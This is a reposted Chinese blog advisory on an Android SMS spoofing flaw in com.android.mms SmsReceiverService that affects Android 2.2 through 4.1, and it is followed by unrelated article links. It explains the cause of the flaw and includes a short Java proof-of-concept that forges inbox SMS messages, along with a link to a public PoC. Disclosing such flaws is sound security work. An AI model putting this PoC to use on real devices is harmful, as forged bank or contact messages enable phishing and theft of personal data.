Android短信欺诈(Smishing)漏洞
来源:互联网 发布:家装vr软件 编辑:程序博客网 时间:2024/05/16 15:50
本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/8631829
作者:Jack_Jia 邮箱: 309zhijun@163.com
一、漏洞描述
北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中发现了一个存在于Android 平台的“短信欺诈”(Smishing)漏洞,据悉,该漏洞可以允许应用在Android平台上进行短信伪装,且在所有版本的Android软件中都存在这一漏洞。
攻击者可利用漏洞窃取个人资料,攻击者也可以利用漏洞,将自己的手机号码伪装成银行或亲友等号码。
二、影响版本
Froyo (2.2.x), Gingerbread (2.3.x), Ice Cream Sandwich (4.0.x), and Jelly Bean (4.1)
三、漏洞原理
Android系统有一套比较完善的安全体系,权限管理就是其中的一部分。当应用需要操作敏感数据时,需要申请相应的权限。
该系统漏洞能够使攻击者无需申请任何权限发送短信到用户收件箱。
出现该漏洞的原因是Android系统的com.android.mms.transaction.SmsReceiverService系统服务未判断启动服务的调用者,攻击者可以通过该应用发送伪装短信到用户收件箱。本漏洞实质上是一种能力的泄漏。
四、POC代码
Intent intent = new Intent();
byte[] pdus = new byte[]{...}; // the sms pdus bytes
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new byte[][]{pdus});
this.startService(intent);
开源POC:https://github.com/thomascannon/android-sms-spoof
五、相关链接
http://www.csc.ncsu.edu/faculty/jiang/smishing.html
http://www.newhua.com/2012/1109/183383.shtml
- Android短信欺诈(Smishing)漏洞
- Android短信欺诈(Smishing)漏洞
- 研究称所有版本Android均存在短信欺诈漏洞
- 短信诈骗 smishing
- 谷歌官方证实所有Android版本存短信欺诈漏洞
- 谷歌证实Android存在欺诈漏洞:涉及所有版本
- 短信欺诈投诉方式
- Android 4.0及以下版本短信漏洞
- android安全问题(八)伪造短信(利用原生android4.0漏洞)
- android安全漏洞(八)伪造短信(利用原生android4.0漏洞)
- android漏洞收集3-短信程序smsreceiverservice服务暴露
- 诺基亚S60短信漏洞
- 短信拒绝服务漏洞
- web短信注册漏洞探索(成佩涛黑客)
- android短信加密(发送加密短信,解密本地短信)
- iPhone 短信欺骗漏洞披露
- android漏洞分析(整理)
- android发送短信(转)
- 高精度模板
- Linux,Windows 和 Mac
- 启用apache,发现80端口被占用【已解决】
- GEL文件
- 苏泊尔电压力锅食谱
- Android短信欺诈(Smishing)漏洞
- RSA 加密算法
- hdu 1124 Factorial
- 清帐管理1
- 归并排序/归并排序求逆序数
- android webview js交互 第一节 (java和js交互)
- TCO round 2A level3 EllysReversals
- linux文件目录简介
- C++中#define的用法